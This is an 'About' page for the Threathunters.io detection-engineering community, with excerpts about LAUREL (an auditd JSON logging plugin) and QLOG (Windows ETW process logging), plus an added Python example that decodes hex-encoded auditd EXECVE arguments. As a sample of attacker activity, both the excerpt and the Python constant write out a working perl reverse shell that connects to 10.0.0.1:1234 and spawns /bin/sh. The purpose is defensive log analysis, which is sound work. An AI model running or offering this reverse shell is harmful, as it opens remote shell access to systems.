
About Threathunters.io

Who are we?

TL;DR

Threathunters.io was initiated by the Deutsche Bahn CSIRT to create a strong community for detection engineering and incident response.

We are a community of volunteer incident responders and detection engineers from around the globe who spend their spare time helping the security community with tools and practical knowledge, so that others can build better detection and response capabilities.

Please visit https://threathunters.io/ for more information.

You may also like our Git repository and our blog.


Happy hunting!

@securityfreax

Popular posts from this blog

Introducing LAUREL: Linux Audit – Usable, Robust, Easy Logging

LAUREL is an event post-processing plugin for _auditd(8)_ that improves its usability in modern security monitoring setups. Why? TL;DR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the sp
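The transformation the excerpt above describes, decoding auditd's hex-encoded EXECVE arguments into readable JSON, is shown here as an added example. This is not LAUREL's own code and not code from the original post; it is a small Python imitation of the relevant auditd behaviour. The encoding rule in encode_execve_arg (quote a clean argument, otherwise emit the raw bytes as uppercase hex) is a simplified assumption about how auditd prints untrusted strings, and the sample record is constructed from the perl one-liner shown in the excerpt; the field names PAGE_HEX_PREFIX, HEX_ENCODED and build_execve_record are this example's own, not LAUREL's output format.

```python
import json
import re

# Constructed sample: the perl one-liner shown decoded in the LAUREL excerpt.
# auditd printed it as hex because it contains spaces and double quotes.
PAYLOAD = ('use Socket;$i="10.0.0.1";$p=1234;'
           'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
           'if(connect(S,sockaddr_in($p,inet_aton($i)))){'
           'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
           'exec("/bin/sh -i");};')

# The hex prefix of a2 exactly as it appears in the excerpt (before the "...").
PAGE_HEX_PREFIX = ("75736520536F636B65743B24693D2231302E302E302E31223B"
                   "24703D313233343B736F636B6574")

_FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')          # key=value pairs
_MSG_RE = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')   # timestamp:serial
_HEX_RE = re.compile(r'[0-9A-F]+')                      # auditd uses uppercase hex


def encode_execve_arg(arg: str) -> str:
    """Imitate auditd's untrusted-string rule (simplified assumption):
    print the argument in double quotes unless it contains a double quote,
    whitespace or a byte outside printable ASCII; then emit raw bytes as
    uppercase hex without quotes."""
    raw = arg.encode()
    if all(0x21 <= b <= 0x7E and b != 0x22 for b in raw):
        return f'"{arg}"'
    return raw.hex().upper()


def decode_execve_arg(value: str) -> tuple:
    """Return (decoded argument, was_hex_encoded)."""
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        return value[1:-1], False
    if _HEX_RE.fullmatch(value) and len(value) % 2 == 0:
        return bytes.fromhex(value).decode("utf-8", errors="replace"), True
    return value, False  # e.g. "(null)" when the kernel could not read the arg


def parse_execve_record(line: str) -> dict:
    """Turn one raw type=EXECVE line into a JSON-friendly dict.
    HEX_ENCODED lists the argv indexes auditd had to hex-encode; inline
    scripts such as perl -e / python -c / bash -c always land there."""
    fields = dict(_FIELD_RE.findall(line))
    if fields.get("type") != "EXECVE":
        raise ValueError("not an EXECVE record")
    m = _MSG_RE.search(line)
    if m is None:
        raise ValueError("missing msg=audit(...) header")
    argc = int(fields["argc"])
    argv, hex_encoded = [], []
    for i in range(argc):
        arg, was_hex = decode_execve_arg(fields[f"a{i}"])
        argv.append(arg)
        if was_hex:
            hex_encoded.append(i)
    return {"ID": m.group(2), "TIME": m.group(1),
            "EXECVE": {"argc": argc, "ARGV": argv, "HEX_ENCODED": hex_encoded}}


def build_execve_record(argv, ts="1626611363.720", serial="348501") -> str:
    """Assemble a raw EXECVE line from argv with the encoder above (sample input only)."""
    fields = " ".join(f"a{i}={encode_execve_arg(a)}" for i, a in enumerate(argv))
    return f"type=EXECVE msg=audit({ts}:{serial}): argc={len(argv)} {fields}"


SAMPLE_RECORD = build_execve_record(["perl", "-e", PAYLOAD])

if __name__ == "__main__":
    print(SAMPLE_RECORD)
    print(json.dumps(parse_execve_record(SAMPLE_RECORD), indent=1))
```

The example only handles the single-line form shown in the excerpt; auditd can also split an oversized argument into aN_len / aN[k] chunks, which a production parser has to reassemble before decoding, and a real pipeline joins the EXECVE record with the SYSCALL, CWD and PATH records sharing the same serial number.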

QLOG - ETW logging for process creation events

What is QLOG

QLOG provides lightweight userland logging of process creation events on Windows, written in C#. It is under development and currently in an experimental state. QLOG uses ETW to collect telemetry; it doesn't use API hooks and doesn't require a driver to be installed on the target system. Currently QLOG supports "process create" events, but other enriched events may follow. QLOG runs as a Windows service, but can also run in console mode if you want to write output to the console directly. I started QLOG to get a better understanding of Windows ETW and some Windows Event Log APIs. QLOG is a research experiment; please don't use it on production systems.

Update, July 2022: We started QLOG as an experiment to learn more about Windows ETW. QLOG provides enriched logging for process creation events on Windows. We have stopped development of QLOG because in the meantime free tools were published which use ETW for telemetry and do a far better job than QLOG. Curious? Hav